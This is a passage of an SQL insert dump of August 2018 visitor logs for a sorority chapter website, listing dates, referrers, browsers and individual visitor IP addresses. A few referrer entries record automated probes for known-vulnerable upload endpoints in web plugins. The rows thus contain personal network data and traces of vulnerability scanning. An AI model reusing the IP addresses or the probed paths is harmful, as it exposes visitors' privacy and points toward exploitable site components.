IE','Windows','7.0','','188.166.32.182','000',2,0),(34311,'2018-08-05','https://zphiblgz.org','Firefox','Windows','1.6.4','','34.214.109.24','000',1,0),(34312,'2018-08-05','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','51.15.63.43','000',1,0),(34313,'2018-08-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(34314,'2018-08-05','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(34315,'2018-08-05','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(34316,'2018-08-05','https://zphiblgz.org','Chrome','Android','68.0.3440.85','','99.203.21.111','000',2,0),(34317,'2018-08-05','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(34318,'2018-08-05','http://zphiblgz.org/?bataboom','MSIE','Windows','6.0','','78.85.191.190','000',2,0),(34319,'2018-08-05','https://zphiblgz.org','python-requests','Unknown','2.18.4','','152.14.17.91','000',2,0),(34320,'2018-08-05','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','185.220.101.46','000',1,0),(34321,'2018-08-05','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(34322,'2018-08-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(34323,'2018-08-05','https://zphiblgz.org','Chrome','Linux','60.0.3112.101','','18.236.225.30','000',2,0),(34324,'2018-08-05','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',2,0),(34325,'2018-08-05','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.7','000',1,0),(34326,'2018-08-05','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.56.126','000',2,0),(34327,'2018-08-05','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(34328,'2018-08-06','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.240','000',1,0),(34329,'2018-08-06','https://zphiblgz.org','Safari','Windows','45.4.3','','34.218.57.59','000',1,0),(34330,'2018-08-06','https://zphiblgz.org','Chrome','Linux','8.28','','34.218.57.59','000',2,0),(34331,'2018-08-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(34332,'2018-08-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(34333,'2018-08-06','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(34334,'2018-08-06','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',1,0),(34335,'2018-08-06','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.125','000',2,0),(34336,'2018-08-06','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(34337,'2018-08-06','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(34338,'2018-08-06','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(34339,'2018-08-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.135','000',8,0),(34340,'2018-08-06','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.184.234.122','000',3,0),(34341,'2018-08-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(34342,'2018-08-06','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',2,0),(34343,'2018-08-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(34344,'2018-08-06','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.41','000',2,0),(34345,'2018-08-06','https://zphiblgz.org','MSIE','Windows','10.0','','88.99.27.172','000',2,0),(34346,'2018-08-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(34347,'2018-08-06','https://zphiblgz.org','Firefox','Windows','40.1','','88.137.179.213','000',2,0),(34348,'2018-08-06','https://zphiblgz.org','Firefox','Windows','40.1','','95.160.158.121','000',2,0),(34349,'2018-08-06','https://www.google.com/','Chrome','Windows','67.0.3396.99','','141.215.16.234','000',1,0),(34350,'2018-08-06','http://www.zphiblgz.org/administrator/components/com_simplephotogallery/lib/uploadFile.php','Chrome','Windows','42.0.2311.152','','209.90.225.194','000',2,0),(34351,'2018-08-06','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','163.172.171.163','000',1,0),(34352,'2018-08-06','https://www.google.com/','Firefox','Windows','53.0','','50.225.39.38','000',17,0),(34353,'2018-08-06','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','108.56.226.58','000',4,0),(34354,'2018-08-06','http://zphiblgz.org','Chrome','Windows','64.0.3282.186','','79.133.155.237','000',1,0),(34355,'2018-08-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(34356,'2018-08-06','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.31','000',1,0),(34357,'2018-08-06','https://www.google.com/','Chrome','Android','68.0.3440.85','','174.205.2.141','000',3,0),(34358,'2018-08-06','https://www.bing.com/','Edge','Windows','17.17134','','73.39.179.88','000',6,0),(34359,'2018-08-06','https://www.google.com/','Safari','iPhone','11.0','','172.58.185.40','000',1,0),(34360,'2018-08-06','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.181','','52.173.241.248','000',1,0),(34361,'2018-08-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(34362,'2018-08-06','http://www.zphiblgz.org/','Firefox','Windows','A46D','','31.184.238.92','000',2,0),(34363,'2018-08-06','http://www.zphiblgz.org/','Opera','Windows','12.17','','31.184.238.92','000',3,0),(34364,'2018-08-06','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(34365,'2018-08-06','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(34366,'2018-08-06','https://zphiblgz.org','MSIE','Windows','6.0','','34.209.175.187','000',2,0),(34367,'2018-08-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.183.165','000',2,0),(34368,'2018-08-06','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(34369,'2018-08-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34370,'2018-08-06','http://zphiblgz.org/wp-content/plugins/flipbook/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(34371,'2018-08-06','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(34372,'2018-08-06','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(34373,'2018-08-06','https://www.google.com/','Safari','iPhone','11.0','','73.87.110.136','000',3,0),(34374,'2018-08-06','https://google.com','Firefox','Windows','29.0','','13.59.240.137','000',2,0),(34375,'2018-08-06','https://google.com','Firefox','Windows','33.0','','13.59.240.137','000',2,0),(34376,'2018-08-06','https://google.com','Firefox','Windows','31.0','','13.59.240.137','000',2,0),(34377,'2018-08-06','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.19','000',2,0),(34378,'2018-08-07','https://www.google.com/','Safari','iPhone','11.0','','69.243.2.17','000',2,0),(34379,'2018-08-07','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(34380,'2018-08-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(34381,'2018-08-07','https://zphiblgz.org','Chrome','Windows','28.0.1468.0','','178.62.86.29','000',2,0),(34382,'2018-08-07','https://zphiblgz.org','Chrome','Windows','27.0.1453.93','','178.62.86.29','000',1,0),(34383,'2018-08-07','https://zphiblgz.org','Chrome','Macintosh','36.0.1944.0','','178.62.86.29','000',2,0),(34384,'2018-08-07','https://zphiblgz.org','Chrome','Windows','36.0.1985.67','','178.62.86.29','000',2,0),(34385,'2018-08-07','http://zphiblgz.org/','MSIE','Windows','6.0','','110.77.152.185','000',1,0),(34386,'2018-08-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(34387,'2018-08-07','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(34388,'2018-08-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(34389,'2018-08-07','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(34390,'2018-08-07','zphiblgz.org','Chrome','Windows','58.0.1145.75','','162.220.219.105','000',1,0),(34391,'2018-08-07','https://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.227','000',1,0),(34392,'2018-08-07','https://zphiblgz.org','AppleWebKit','Windows','534','','69.171.240.18','000',1,0),(34393,'2018-08-07','https://zphiblgz.org','AppleWebKit','Windows','534','','69.171.240.19','000',1,0),(34394,'2018-08-07','https://zphiblgz.org/','AppleWebKit','Windows','534','','69.171.240.17','000',1,0),(34395,'2018-08-07','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=AT0n-Lbf1LE52Vcm29RSB2UzpJZyX3tKqB6SmNYkYCaVBSs65xjbfEIIKjhECPqMjUMr7yqUfZu2RoNBUFErfFi_CbqYk7_PBibqr2w6iV3swyf4510GKWs0ofu2JT1-HSCRuZj_E6ZOSg','Chrome','Windows','41.0.2228.0','','66.220.156.57','000',3,0),(34396,'2018-08-07','https://zphiblgz.org','Chrome','Windows','38.6.11','','34.218.57.59','000',1,0),(34397,'2018-08-07','https://zphiblgz.org','Firefox','Linux','8.18','','34.218.57.59','000',2,0),(34398,'2018-08-07','https://zphiblgz.org','Chrome','Windows','18.2.0','','34.218.57.59','000',2,0),(34399,'2018-08-07','https://zphiblgz.org','Firefox','Windows','20.8.15','','34.218.57.59','000',2,0),(34400,'2018-08-07','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',2,0),(34401,'2018-08-07','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',2,0),(34402,'2018-08-07','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(34403,'2018-08-07','https://zphiblgz.org','Firefox','Windows','40.1','','114.4.216.33','000',2,0),(34404,'2018-08-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.190.191.188','000',2,0),(34405,'2018-08-07','http://zphiblgz.org/','Safari','Linux','534.34','','35.190.191.188','000',1,0),(34406,'2018-08-07','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(34407,'2018-08-07','http://www.bing.com/search?q=gamma+alpha+gamma+zeta+chapter+of+zeta+phi+beta+sorority&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','23.101.169.3','000',8,0),(34408,'2018-08-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(34409,'2018-08-07','zphiblgz.org','Chrome','Windows','58.0.1145.75','','195.200.224.74','000',1,0),(34410,'2018-08-07','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(34411,'2018-08-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(34412,'2018-08-07','https://r.search.yahoo.com/_ylt=AwrE1xi75mlbqowAZA1XNyoA;_ylu=X3oDMTEyczNvZTdzBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjQ1MTdfMQRzZWMDc3I-/RV=2/RE=1533695803/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=f0rLps27KmgcmdGJWP.qfoO.2Eo-','MSIE','Windows','11.0','','152.180.7.254','000',7,0),(34413,'2018-08-07','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.173','000',2,0),(34414,'2018-08-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(34415,'2018-08-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(34416,'2018-08-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.237.94.225','000',2,0),(34417,'2018-08-07','https://zphiblgz.org','Safari','iPhone','5.0.2','','35.237.94.225','000',3,0),(34418,'2018-08-07','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1873.e3ccXcYHnC5RhHnnIL7mqB0RpQOknkJ28fCVYE04QoBDMyQXzKfF6P1yuPtAEs6B.1e829cb8a1b20376c808a9acca54d5ff8e985548&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1k0VnYwcS00NlIxTGlqalNMMU1ENWt1X05SNl9EaU5WeVZGd1BMNDdCcXdwWlFWclZtY1JDR3FJOTAwLXRhZjZiSUNLTjVUZWpFQQ&b64e=2&sign=ba165eab1645ef09eb6da3cdf73571ce&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbirxCrvG5E5TdlYOPQttPc2vr-Bwtgya1A7auO2Z6cOVS2wCB8EAUnaoR0i6Q1qr6jyUjNTBvwMKVxruuPXjDPNgjJojnQrRB-l5pGAG7QtI3YQdIgbPqoKZ9iPS-Mj7ex&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEIjpkkVlh9enFZbiBX4o263IEMMkC47HABb0ce2Mqw_5pNDfWloD91UzmO9SekclmQ&l10n=ru&cts=1533675465656&mc=2.60469974359','Chrome','Windows','65.0.3325.181','','79.111.57.52','000',2,0),(34419,'2018-08-07','https://zphiblgz.org','Firefox','Windows','40.1','','173.0.202.184','000',2,0),(34420,'2018-08-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(34421,'2018-08-07','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(34422,'2018-08-07','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.28','000',1,0),(34423,'2018-08-07','https://zphiblgz.org/event/chic-fil-spirit-night/','Firefox','Windows','31.0','','31.184.238.92','000',3,0),(34424,'2018-08-07','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',2,0),(34425,'2018-08-07','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(34426,'2018-08-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',2,0),(34427,'2018-08-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.15','000',1,0),(34428,'2018-08-07','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.127','000',1,0),(34429,'2018-08-07','https://www.facebook.com/','Chrome','Windows','68.0.3440.84','','69.140.240.88','000',11,0),(34430,'2018-08-07','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','134.249.141.24','000',1,0),(34431,'2018-08-07','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.80','000',1,0),(34432,'2018-08-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(34433,'2018-08-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','188.166.147.95','000',2,0),(34434,'2018-08-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(34435,'2018-08-07','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(34436,'2018-08-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(34437,'2018-08-08','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.47.2','000',1,0),(34438,'2018-08-08','http://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','184.154.47.3','000',1,0),(34439,'2018-08-08','https://www.google.com/','Safari','iPhone','11.0','','134.192.250.88','000',2,0),(34440,'2018-08-08','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','18.237.147.89','000',2,0),(34441,'2018-08-08','http://www.ashbylibrary.org/wp-login.php','Chrome','Macintosh','56.0.2924.87','','114.134.23.20','000',2,0),(34442,'2018-08-08','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(34443,'2018-08-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(34444,'2018-08-08','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.194.24','000',1,0),(34445,'2018-08-08','https://zphiblgz.org','python-requests','Unknown','2.19.1','','139.60.162.201','000',2,0),(34446,'2018-08-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(34447,'2018-08-08','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','134.249.50.185','000',1,0),(34448,'2018-08-08','https://zphiblgz.org','AppleWebKit','Windows','5.47','','34.210.250.80','000',1,0),(34449,'2018-08-08','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','18.236.186.172','000',2,0),(34450,'2018-08-08','https://zphiblgz.org','Firefox','Windows','40.1','','118.209.116.146','000',2,0),(34451,'2018-08-08','https://zphiblgz.org','Firefox','Windows','40.1','','189.59.189.22','000',2,0),(34452,'2018-08-08','https://www.google.com/','Safari','iPhone','11.0','','96.244.147.110','000',4,0),(34453,'2018-08-08','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','31.202.101.40','000',2,0),(34454,'2018-08-08','https://zphiblgz.org','Firefox','Windows','45.0','','104.144.225.139','000',1,0),(34455,'2018-08-08','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(34456,'2018-08-08','https://zphiblgz.org','Firefox','Windows','40.1','','187.1.47.62','000',2,0),(34457,'2018-08-08','https://www.google.com/','Chrome','Macintosh','68.0.3440.84','','66.44.94.198','000',3,0),(34458,'2018-08-08','http://site.ru','Chrome','Windows','5.0.375.99','','139.99.103.70','000',2,0),(34459,'2018-08-08','https://r.search.yahoo.com/_ylt=A0geJaFtK2tb1woAngNx.9w4;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1533778925/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=d_BFWodHvVM.Olq85gmd5pUHhbg-','Safari','iPhone','11.0','','73.173.17.6','000',2,0),(34460,'2018-08-08','https://zphiblgz.org/scholarship/lgzscholarshipreleaseform/','AppleWebKit','Windows','534','','40.77.189.154','000',1,0),(34461,'2018-08-08','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(34462,'2018-08-08','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(34463,'2018-08-08','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(34464,'2018-08-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(34465,'2018-08-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(34466,'2018-08-08','https://zphiblgz.org/','Chrome','Windows','67.0.3396.62','','107.173.177.108','000',1,0),(34467,'2018-08-08','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(34468,'2018-08-08','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(34469,'2018-08-08','https://zphiblgz.org','AppleWebKit','Macintosh','605.1.15','','173.69.169.221','000',1,0),(34470,'2018-08-08','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.169.221','000',1,0),(34471,'2018-08-08','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','95.216.15.180','000',1,0),(34472,'2018-08-08','https://zphiblgz.org','Safari','Macintosh','11.1.2','','173.69.169.221','000',4,0),(34473,'2018-08-08','https://zphiblgz.org','Firefox','Windows','40.1','','92.52.23.56','000',2,0),(34474,'2018-08-08','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(34475,'2018-08-08','http://lm.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=AT0yGoDehntVngoqDD0cF93-0dAlvUAWqb1XTolwyeUN8ee6iIYUHBxHTr2zpdxADMO5adHacQ_z0_2G-DQsGMyaJIQjD-0IOVwWoe8-VtuwLPE1rJh5n032j331qDOt0yNPAVMLU3YMRQ9d9Mo','AppleWebKit','iPhone','605.1.15','','73.171.93.21','000',8,0),(34476,'2018-08-08','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(34477,'2018-08-08','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(34478,'2018-08-08','https://zphiblgz.org/','Chrome','Linux','56.0.2924.87','','163.172.4.153','000',1,0),(34479,'2018-08-08','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.27','000',1,0),(34480,'2018-08-08','https://www.google.com/','Safari','iPhone','11.0','','73.213.10.70','000',4,0),(34481,'2018-08-08','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(34482,'2018-08-08','https://www.google.com/','Safari','iPhone','11.0','','174.200.9.130','000',2,0),(34483,'2018-08-08','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(34484,'2018-08-08','http://zphiblgz.org/','Firefox','Windows','53.0','','31.11.139.205','000',2,0),(34485,'2018-08-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(34486,'2018-08-08','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(34487,'2018-08-08','https://zphiblgz.org','Safari','iPad','11.0','','71.179.100.139','000',8,0),(34488,'2018-08-08','http://zphiblgz.org/','Firefox','Windows','37.0','','167.114.56.169','000',2,0),(34489,'2018-08-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.220.91','000',4,0),(34490,'2018-08-09','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34491,'2018-08-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.102','000',1,0),(34492,'2018-08-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.108','000',1,0),(34493,'2018-08-09','zphiblgz.org/404.php','Opera Next','Windows','49.0.2725.47','','178.137.16.151','000',1,0),(34494,'2018-08-09','http://zphiblgz.org/','Chrome','Windows','53.0.2785.104','','185.168.249.226','000',2,0),(34495,'2018-08-09','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','193.169.252.17','000',3,0),(34496,'2018-08-09','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.131.56.97','000',1,0),(34497,'2018-08-09','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.109','000',2,0),(34498,'2018-08-09','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(34499,'2018-08-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(34500,'2018-08-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.99.196','000',2,0),(34501,'2018-08-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(34502,'2018-08-09','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(34503,'2018-08-09','https://www.google.com/','Firefox','Macintosh','52.0','','50.225.39.37','000',11,0),(34504,'2018-08-09','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(34505,'2018-08-09','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',2,0),(34506,'2018-08-09','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(34507,'2018-08-09','http://site.ru','Chrome','Windows','5.0.375.99','','66.198.240.60','000',1,0),(34508,'2018-08-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(34509,'2018-08-09','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.35','000',1,0),(34510,'2018-08-09','zphiblgz.org','Chrome','Windows','58.0.1145.75','','173.212.224.12','000',1,0),(34511,'2018-08-09','https://www.google.com/','Safari','iPhone','11.0','','107.77.204.85','000',5,0),(34512,'2018-08-09','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(34513,'2018-08-09','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(34514,'2018-08-09','http://www.zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','209.90.225.194','000',2,0),(34515,'2018-08-09','https://zphiblgz.org','Chrome','Windows','69.0.3497.23','','185.107.70.202','000',1,0),(34516,'2018-08-09','https://zphiblgz.org','Chrome','Windows','69.0.3497.23','','185.175.208.180','000',1,0),(34517,'2018-08-09','https://zphiblgz.org','Chrome','Windows','69.0.3497.23','','209.141.51.150','000',1,0),(34518,'2018-08-09','https://zphiblgz.org','Chrome','Windows','69.0.3497.23','','51.255.202.66','000',1,0),(34519,'2018-08-09','https://zphiblgz.org','Chrome','Windows','69.0.3497.23','','93.115.95.206','000',1,0),(34520,'2018-08-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(34521,'2018-08-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(34522,'2018-08-09','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.220.186.249','000',3,0),(34523,'2018-08-09','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','178.175.148.19','000',1,0),(34524,'2018-08-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.244','000',1,0),(34525,'2018-08-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.249','000',1,0),(34526,'2018-08-09','https://zphiblgz.org','python-requests','Unknown','2.19.1','','139.60.162.201','000',2,0),(34527,'2018-08-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(34528,'2018-08-09','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(34529,'2018-08-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(34530,'2018-08-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.158.57','000',12,0),(34531,'2018-08-09','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.158.57','000',1,0),(34532,'2018-08-09','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(34533,'2018-08-09','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(34534,'2018-08-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(34535,'2018-08-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(34536,'2018-08-09','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.241','000',1,0),(34537,'2018-08-09','https://www.google.com/','Safari','iPhone','11.0','','172.56.15.80','000',2,0),(34538,'2018-08-09','https://zphiblgz.org','python-requests','Unknown','2.17.3','','35.185.16.36','000',2,0),(34539,'2018-08-09','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(34540,'2018-08-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.150','000',2,0),(34541,'2018-08-09','http://zphiblgz.org/','MSIE','Windows','6.0','','36.80.117.241','000',1,0),(34542,'2018-08-09','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.35','000',1,0),(34543,'2018-08-10','http://www.bing.com/search?q=gamma+alpha+gamma+zeta+chapter-+zeta+phi+beta+sorority+inc&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','23.101.169.3','000',7,0),(34544,'2018-08-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(34545,'2018-08-10','https://zphiblgz.org','python-requests','Unknown','2.2.1','','62.210.130.247','000',14,0),(34546,'2018-08-10','https://zphiblgz.org','Firefox','Windows','36.0','','62.210.130.247','000',2,0),(34547,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','176.110.240.41','000',1,0),(34548,'2018-08-10','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.144','000',1,0),(34549,'2018-08-10','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.65.185.87','000',3,0),(34550,'2018-08-10','http://zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','209.90.225.194','000',1,0),(34551,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.204.20.250','000',1,0),(34552,'2018-08-10','zphiblgz.org','Chrome','Windows','58.0.1145.75','','195.154.118.41','000',1,0),(34553,'2018-08-10','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(34554,'2018-08-10','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(34555,'2018-08-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(34556,'2018-08-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(34557,'2018-08-10','https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','AppleWebKit','Windows','534','','199.30.24.75','000',1